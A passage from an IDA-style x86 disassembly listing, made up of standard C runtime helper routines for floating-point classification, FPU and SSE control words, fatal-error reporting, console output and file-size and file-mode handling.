cmp [ebp+arg_0], edx
jnz short loc_40FF67
push 2
loc_40FF64: ; CODE XREF: sub_40FF3C+3C�j
; sub_40FF3C+55�j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF67: ; CODE XREF: sub_40FF3C+11�j
; sub_40FF3C+1F�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_40FF7A
push 3
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF7A: ; CODE XREF: sub_40FF3C+38�j
cmp cx, 7FF0h
jnz short loc_40FF93
test [ebp+arg_4], 7FFFFh
jnz short loc_40FF8F
cmp [ebp+arg_0], edx
jz short loc_40FF93
loc_40FF8F: ; CODE XREF: sub_40FF3C+4C�j
push 4
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF93: ; CODE XREF: sub_40FF3C+43�j
; sub_40FF3C+51�j
xor eax, eax
pop ebp
retn
sub_40FF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF97(double,int)
sub_40FF97 proc near ; CODE XREF: sub_40FB20+122�p
var_C = qword ptr -0Ch
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
fldz
fcom [ebp+arg_0]
fnstsw ax
test ah, 44h
jp short loc_40FFAD
xor edx, edx
jmp loc_41003F
; ---------------------------------------------------------------------------
loc_40FFAD: ; CODE XREF: sub_40FF97+D�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41001A
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_40FFC5
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41001A
loc_40FFC5: ; CODE XREF: sub_40FF97+27�j
fcomp [ebp+arg_0]
mov edx, 0FFFFFC03h
fnstsw ax
test ah, 41h
jnz short loc_40FFD9
xor eax, eax
inc eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFD9: ; CODE XREF: sub_40FF97+3B�j
xor eax, eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFDD: ; CODE XREF: sub_40FF97+5E�j
shl dword ptr [ebp+arg_0+4], 1
test dword ptr [ebp+arg_0], 80000000h
jz short loc_40FFED
or dword ptr [ebp+arg_0+4], 1
loc_40FFED: ; CODE XREF: sub_40FF97+50�j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_40FFF1: ; CODE XREF: sub_40FF97+40�j
; sub_40FF97+44�j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_40FFDD
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_410007
or word ptr [ebp+arg_0+6], 8000h
loc_410007: ; CODE XREF: sub_40FF97+68�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
add esp, 0Ch
jmp short loc_41003F
; ---------------------------------------------------------------------------
loc_41001A: ; CODE XREF: sub_40FF97+1E�j
; sub_40FF97+2C�j
push ecx ; int
fstp st
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_41003F: ; CODE XREF: sub_40FF97+11�j
; sub_40FF97+81�j
mov eax, [ebp+arg_8]
mov [eax], edx
pop ebp
retn
sub_40FF97 endp
; =============== S U B R O U T I N E =======================================
sub_410046 proc near ; CODE XREF: sub_40F846+DC�p
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410046 endp
; =============== S U B R O U T I N E =======================================
sub_410051 proc near ; CODE XREF: sub_40F846:loc_40FA59�p
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41005D proc near ; CODE XREF: sub_40A6EF+13�p
; sub_40A6EF+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
movzx eax, ax
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41005D endp
; =============== S U B R O U T I N E =======================================
sub_410084 proc near ; CODE XREF: sub_40FB20+20�p
; sub_40FB20+3A�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_41009A
fld ds:tbyte_4240E0
fistp [esp+8+arg_0]
wait
loc_41009A: ; CODE XREF: sub_410084+9�j
test cl, 8
jz short loc_4100AF
fstsw ax
fld ds:tbyte_4240E0
fstp [esp+8+var_8]
wait
fstsw ax
loc_4100AF: ; CODE XREF: sub_410084+19�j
test cl, 10h
jz short loc_4100BE
fld ds:tbyte_4240EC
fstp [esp+8+var_8]
wait
loc_4100BE: ; CODE XREF: sub_410084+2E�j
test cl, 4
jz short loc_4100CC
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_4100CC: ; CODE XREF: sub_410084+3D�j
test cl, 20h
jz short loc_4100D7
fldpi
fstp [esp+8+var_8]
wait
loc_4100D7: ; CODE XREF: sub_410084+4B�j
pop ecx
pop ecx
retn
sub_410084 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100DA proc near ; CODE XREF: sub_4134A7+243�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421908
call __SEH_prolog4
xor eax, eax
cmp ds:dword_433C7C, eax
jz short loc_410146
test byte ptr [ebp+arg_0], 40h
jz short loc_41013E
cmp ds:dword_4240F8, eax
jz short loc_41013E
mov [ebp+ms_exc.disabled], eax
ldmxcsr [ebp+arg_0]
jmp short loc_410135
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_41011F
cmp eax, 0C000001Dh
jz short loc_41011F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41011F: ; CODE XREF: sub_4100DA+39�j
; sub_4100DA+40�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and ds:dword_4240F8, 0
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410135: ; CODE XREF: sub_4100DA+2B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_410146
; ---------------------------------------------------------------------------
loc_41013E: ; CODE XREF: sub_4100DA+1A�j
; sub_4100DA+22�j
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410146: ; CODE XREF: sub_4100DA+14�j
; sub_4100DA+62�j
call __SEH_epilog4
retn
sub_4100DA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41014C proc near ; CODE XREF: sub_41019D+A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov dl, [ebp+arg_C]
test [ecx+eax+1Dh], dl
jnz short loc_41018B
cmp [ebp+arg_8], 0
jz short loc_410185
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, [ebp+arg_8]
jmp short loc_410187
; ---------------------------------------------------------------------------
loc_410185: ; CODE XREF: sub_41014C+25�j
xor eax, eax
loc_410187: ; CODE XREF: sub_41014C+37�j
test eax, eax
jz short loc_41018E
loc_41018B: ; CODE XREF: sub_41014C+1F�j
xor eax, eax
inc eax
loc_41018E: ; CODE XREF: sub_41014C+3D�j
cmp [ebp+var_4], 0
jz short locret_41019B
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_41019B: ; CODE XREF: sub_41014C+46�j
leave
retn
sub_41014C endp
; =============== S U B R O U T I N E =======================================
sub_41019D proc near ; CODE XREF: sub_40AB84+3F�p
; sub_40ACBC+53�p ...
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
push 0
call sub_41014C
add esp, 10h
retn
sub_41019D endp
; =============== S U B R O U T I N E =======================================
sub_4101B0 proc near ; CODE XREF: sub_40B11E+56�p
; sub_40B699+59�p ...
arg_0 = dword ptr 4
xor eax, eax
inc eax
cmp [esp+arg_0], 0
jnz short locret_4101BC
xor eax, eax
locret_4101BC: ; CODE XREF: sub_4101B0+8�j
retn
sub_4101B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_4101BD proc near ; CODE XREF: sub_40BE59:loc_40BE87�p
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
test ds:byte_4240FC, 1
push esi
jz short loc_4101EA
push 0Ah
call sub_409AB4
pop ecx
loc_4101EA: ; CODE XREF: sub_4101BD+23�j
call sub_40DD1C
test eax, eax
jz short loc_4101FB
push 16h
call sub_40DD29
pop ecx
loc_4101FB: ; CODE XREF: sub_4101BD+34�j
test ds:byte_4240FC, 2
jz loc_4102A8
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
add esp, 0Ch
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
push 0
mov [ebp+2A8h+var_328], 40000015h
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call ds:dword_41D19C
lea eax, [ebp+2A8h+var_2D8]
push eax
call ds:dword_41D198 ; UnhandledExceptionFilter
loc_4102A8: ; CODE XREF: sub_4101BD+45�j
push 3
call sub_407AEA
int 3 ; Trap to Debugger
sub_4101BD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102B0 proc near ; CODE XREF: sub_40BF57+25A�p
; sub_40C33C+150�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push 6
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call ds:dword_41D054
test eax, eax
jnz short loc_4102E1
or eax, 0FFFFFFFFh
jmp short loc_4102EB
; ---------------------------------------------------------------------------
loc_4102E1: ; CODE XREF: sub_4102B0+2A�j
lea eax, [ebp+var_C]
push eax
call sub_403EBD
pop ecx
loc_4102EB: ; CODE XREF: sub_4102B0+2F�j
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102F7 proc near ; CODE XREF: sub_40BF57+285�p
; sub_40BF57+336�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
mov [ebp+var_28], eax
mov eax, [ebp+arg_C]
push ebx
mov [ebp+var_30], eax
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
push edi
xor edi, edi
cmp eax, [ebp+arg_4]
mov [ebp+var_34], ecx
mov [ebp+var_20], edi
mov [ebp+var_2C], edi
jz loc_410494
mov esi, ds:dword_41D1B4
lea ecx, [ebp+var_18]
push ecx
push eax
call esi
test eax, eax
mov ebx, ds:dword_41D0A0
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call esi
test eax, eax
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
mov esi, [ebp+var_24]
cmp esi, 0FFFFFFFFh
mov [ebp+var_2C], 1
jnz short loc_410380
push [ebp+var_28]
call sub_404130
mov esi, eax
pop ecx
inc esi
loc_410380: ; CODE XREF: sub_4102F7+7B�j
cmp esi, edi
loc_410382: ; CODE XREF: sub_4102F7+C6�j
jle short loc_4103DF
cmp esi, 7FFFFFF0h
ja short loc_4103DF
lea eax, [esi+esi+8]
cmp eax, 400h
ja short loc_4103C6
call sub_4104B0
mov eax, esp
cmp eax, edi
jz short loc_4103DA
mov dword ptr [eax], 0CCCCh
jmp short loc_4103D7
; ---------------------------------------------------------------------------
loc_4103AA: ; CODE XREF: sub_4102F7+53�j
; sub_4102F7+59�j ...
push edi
push edi
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx
mov esi, eax
cmp esi, edi
jnz short loc_410382
loc_4103BF: ; CODE XREF: sub_4102F7+EE�j
xor eax, eax
jmp loc_410497
; ---------------------------------------------------------------------------
loc_4103C6: ; CODE XREF: sub_4102F7+9E�j
push eax
call sub_4036E0
cmp eax, edi
pop ecx
jz short loc_4103DA
mov dword ptr [eax], 0DDDDh
loc_4103D7: ; CODE XREF: sub_4102F7+B1�j
add eax, 8
loc_4103DA: ; CODE XREF: sub_4102F7+A9�j
; sub_4102F7+D8�j
mov [ebp+var_1C], eax
jmp short loc_4103E2
; ---------------------------------------------------------------------------
loc_4103DF: ; CODE XREF: sub_4102F7:loc_410382�j
; sub_4102F7+93�j
mov [ebp+var_1C], edi
loc_4103E2: ; CODE XREF: sub_4102F7+E6�j
cmp [ebp+var_1C], edi
jz short loc_4103BF
lea eax, [esi+esi]
push eax
push edi
push [ebp+var_1C]
call sub_407B70
add esp, 0Ch
push esi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx
test eax, eax
jz short loc_41048B
mov ebx, [ebp+var_34]
cmp ebx, edi
jz short loc_410430
push edi
push edi
push [ebp+arg_14]
push ebx
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ds:dword_41D138
test eax, eax
jz short loc_41048B
mov [ebp+var_20], ebx
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410430: ; CODE XREF: sub_4102F7+11A�j
cmp [ebp+var_2C], edi
mov ebx, ds:dword_41D138
jnz short loc_41044F
push edi
push edi
push edi
push edi
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx
mov esi, eax
cmp esi, edi
jz short loc_41048B
loc_41044F: ; CODE XREF: sub_4102F7+142�j
push esi
push 1
call sub_40777A
cmp eax, edi
pop ecx
pop ecx
mov [ebp+var_20], eax
jz short loc_41048B
push edi
push edi
push esi
push eax
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx
cmp eax, edi
jnz short loc_410480
push [ebp+var_20]
call sub_403603
pop ecx
mov [ebp+var_20], edi
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410480: ; CODE XREF: sub_4102F7+179�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_41048B
mov ecx, [ebp+var_30]
mov [ecx], eax
loc_41048B: ; CODE XREF: sub_4102F7+113�j
; sub_4102F7+132�j ...
push [ebp+var_1C]
call sub_40BF3C
pop ecx
loc_410494: ; CODE XREF: sub_4102F7+38�j
mov eax, [ebp+var_20]
loc_410497: ; CODE XREF: sub_4102F7+CA�j
lea esp, [ebp-40h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102F7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4104B0 proc near ; CODE XREF: sub_40BF57+F3�p
; sub_40BF57+1B1�p ...
arg_0 = byte ptr 4
push ecx
lea ecx, [esp+4+arg_0]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
sub_4104B0 endp
; ---------------------------------------------------------------------------
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104DC proc near ; CODE XREF: sub_40CE5A+2A1�p
; sub_40CE5A+2C1�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
xor esi, esi
cmp ds:dword_424218, esi
jz short loc_410545
cmp ds:dword_424224, 0FFFFFFFEh
jnz short loc_410505
call sub_41142B
loc_410505: ; CODE XREF: sub_4104DC+22�j
mov eax, ds:dword_424224
cmp eax, 0FFFFFFFFh
jnz short loc_410515
loc_41050F: ; CODE XREF: sub_4104DC+56�j
; sub_4104DC+61�j ...
or ax, 0FFFFh
jmp short loc_410585
; ---------------------------------------------------------------------------
loc_410515: ; CODE XREF: sub_4104DC+31�j
push esi
lea ecx, [ebp+var_10]
push ecx
push 1
lea ecx, [ebp+arg_0]
push ecx
push eax
call ds:dword_41D0AC
test eax, eax
jnz short loc_410592
cmp ds:dword_424218, 2
jnz short loc_41050F
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_41050F
mov ds:dword_424218, esi
loc_410545: ; CODE XREF: sub_4104DC+19�j
push esi
push esi
push 5
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push esi
call ds:dword_41D0B0
push eax
call ds:dword_41D138
mov ecx, ds:dword_424224
cmp ecx, 0FFFFFFFFh
jz short loc_41050F
push esi
lea edx, [ebp+var_10]
push edx
push eax
lea eax, [ebp+var_C]
push eax
push ecx
call ds:dword_41D0B4
test eax, eax
jz short loc_41050F
loc_410581: ; CODE XREF: sub_4104DC+C0�j
mov ax, [ebp+arg_0]
loc_410585: ; CODE XREF: sub_4104DC+37�j
mov ecx, [ebp+var_4]
xor ecx, ebp
pop esi
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_410592: ; CODE XREF: sub_4104DC+4D�j
mov ds:dword_424218, 1
jmp short loc_410581
sub_4104DC endp
; =============== S U B R O U T I N E =======================================
sub_41059E proc near ; DATA XREF: seg002:off_423F80�o
; seg002:off_423F84�o ...
push 2
call sub_40785D
pop ecx
retn
sub_41059E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105A7 proc near ; CODE XREF: sub_40E072+36F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor ebx, ebx
push 1
push ebx
push ebx
push [ebp+arg_0]
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call sub_40CCBE
mov [ebp+var_18], eax
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_14], edx
jz short loc_41062D
push 2
push ebx
push ebx
push [ebp+arg_0]
call sub_40CCBE
mov ecx, eax
and ecx, edx
add esp, 10h
cmp ecx, 0FFFFFFFFh
jz short loc_41062D
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
sub esi, eax
sbb edi, edx
js loc_4106C2
jg short loc_410606
cmp esi, ebx
jbe loc_4106C2
loc_410606: ; CODE XREF: sub_4105A7+55�j
mov ebx, 1000h
push ebx
push 8
call ds:dword_41D100
push eax
call ds:dword_41D114
test eax, eax
mov [ebp+var_4], eax
jnz short loc_410639
call sub_4057D3
mov dword ptr [eax], 0Ch
loc_41062D: ; CODE XREF: sub_4105A7+2B�j
; sub_4105A7+43�j ...
call sub_4057D3
mov eax, [eax]
loc_410634: ; CODE XREF: sub_4105A7+1AF�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_410639: ; CODE XREF: sub_4105A7+79�j
push 8000h
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_41064B: ; CODE XREF: sub_4105A7+CF�j
; sub_4105A7+D3�j
test edi, edi
jl short loc_410659
jg short loc_410655
cmp esi, ebx
jb short loc_410659
loc_410655: ; CODE XREF: sub_4105A7+A8�j
mov eax, ebx
jmp short loc_41065B
; ---------------------------------------------------------------------------
loc_410659: ; CODE XREF: sub_4105A7+A6�j
; sub_4105A7+AC�j
mov eax, esi
loc_41065B: ; CODE XREF: sub_4105A7+B0�j
push eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40CE5A
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4106A5
cdq
sub esi, eax
sbb edi, edx
js short loc_41067C
jg short loc_41064B
test esi, esi
ja short loc_41064B
loc_41067C: ; CODE XREF: sub_4105A7+CD�j
mov esi, [ebp+var_10]
loc_41067F: ; CODE XREF: sub_4105A7+119�j
push [ebp+var_8]
push [ebp+arg_0]
call sub_4107CD
pop ecx
pop ecx
push [ebp+var_4]
push 0
call ds:dword_41D100
push eax
call ds:dword_41D10C
xor ebx, ebx
jmp loc_41072B
; ---------------------------------------------------------------------------
loc_4106A5: ; CODE XREF: sub_4105A7+C6�j
call sub_4057E6
cmp dword ptr [eax], 5
jnz short loc_4106BA
call sub_4057D3
mov dword ptr [eax], 0Dh
loc_4106BA: ; CODE XREF: sub_4105A7+106�j
or esi, 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_41067F
; ---------------------------------------------------------------------------
loc_4106C2: ; CODE XREF: sub_4105A7+4F�j
; sub_4105A7+59�j
cmp edi, ebx
jg short loc_410737
jl short loc_4106CC
cmp esi, ebx
jnb short loc_410737
loc_4106CC: ; CODE XREF: sub_4105A7+11F�j
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0A8
neg eax
sbb eax, eax
neg eax
dec eax
cdq
mov [ebp+var_10], eax
and eax, edx
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], edx
jnz short loc_410737
call sub_4057D3
mov dword ptr [eax], 0Dh
call sub_4057E6
mov esi, eax
call ds:dword_41D0F0
mov [esi], eax
mov esi, [ebp+var_10]
loc_41072B: ; CODE XREF: sub_4105A7+F9�j
and esi, [ebp+var_C]
cmp esi, 0FFFFFFFFh
jz loc_41062D
loc_410737: ; CODE XREF: sub_4105A7+11D�j
; sub_4105A7+123�j ...
push ebx
push [ebp+var_14]
push [ebp+var_18]
push [ebp+arg_0]
call sub_40CCBE
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz loc_41062D
xor eax, eax
jmp loc_410634
sub_4105A7 endp
; =============== S U B R O U T I N E =======================================
sub_41075B proc near ; CODE XREF: sub_40E072+322�p
; sub_40E072+37F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41077C
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41077C: ; CODE XREF: sub_41075B+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_41D074
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41079D
call ds:dword_41D0F0
jmp short loc_41079F
; ---------------------------------------------------------------------------
loc_41079D: ; CODE XREF: sub_41075B+38�j
xor eax, eax
loc_41079F: ; CODE XREF: sub_41075B+40�j
test eax, eax
jz short loc_4107AF
push eax
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_4107CA
; ---------------------------------------------------------------------------
loc_4107AF: ; CODE XREF: sub_41075B+46�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
mov eax, ds:dword_433CA0[eax*4]
lea eax, [eax+esi+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_4107CA: ; CODE XREF: sub_41075B+52�j
pop edi
pop esi
retn
sub_41075B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4107CD proc near ; CODE XREF: sub_4105A7+9A�p
; sub_4105A7+DE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov eax, edx
sar eax, 5
and edx, 1Fh
imul edx, 28h
push ebx
mov ebx, [ebp+arg_4]
push esi
lea esi, ds:433CA0h[eax*4]
mov eax, [esi]
lea ecx, [eax+edx]
movzx eax, byte ptr [ecx+4]
and eax, 80h
mov [ebp+arg_0], eax
mov al, [ecx+24h]
add al, al
movsx eax, al
push edi
mov edi, 4000h
sar eax, 1
cmp ebx, edi
jz short loc_41085F
cmp ebx, 8000h
jz short loc_410859
cmp ebx, 10000h
jz short loc_410845
cmp ebx, 20000h
jz short loc_410845
cmp ebx, 40000h
jnz short loc_41086C
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 81h
or dl, 1
loc_410841: ; CODE XREF: sub_4107CD+8A�j
mov [ecx], dl
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_410845: ; CODE XREF: sub_4107CD+50�j
; sub_4107CD+58�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
mov dl, [ecx]
and dl, 82h
or dl, 2
jmp short loc_410841
; ---------------------------------------------------------------------------
loc_410859: ; CODE XREF: sub_4107CD+48�j
and byte ptr [ecx+4], 7Fh
jmp short loc_41086C
; ---------------------------------------------------------------------------
loc_41085F: ; CODE XREF: sub_4107CD+40�j
or byte ptr [ecx+4], 80h
mov ecx, [esi]
lea ecx, [ecx+edx+24h]
and byte ptr [ecx], 80h
loc_41086C: ; CODE XREF: sub_4107CD+60�j
; sub_4107CD+76�j ...
cmp [ebp+arg_0], 0
jnz short loc_410879
mov eax, 8000h
jmp short loc_410884
; ---------------------------------------------------------------------------
loc_410879: ; CODE XREF: sub_4107CD+A3�j
neg eax
sbb eax, eax
and eax, 0C000h
add eax, edi
loc_410884: ; CODE XREF: sub_4107CD+AA�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4107CD endp
; =============== S U B R O U T I N E =======================================
sub_410889 proc near ; CODE XREF: sub_40E072+40�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_4108B1
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4108B1: ; CODE XREF: sub_410889+9�j
mov ecx, ds:dword_426560
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_410889 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4108BD proc near ; CODE XREF: sub_410A38+6�p
; DATA XREF: sub_40F70B+55�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
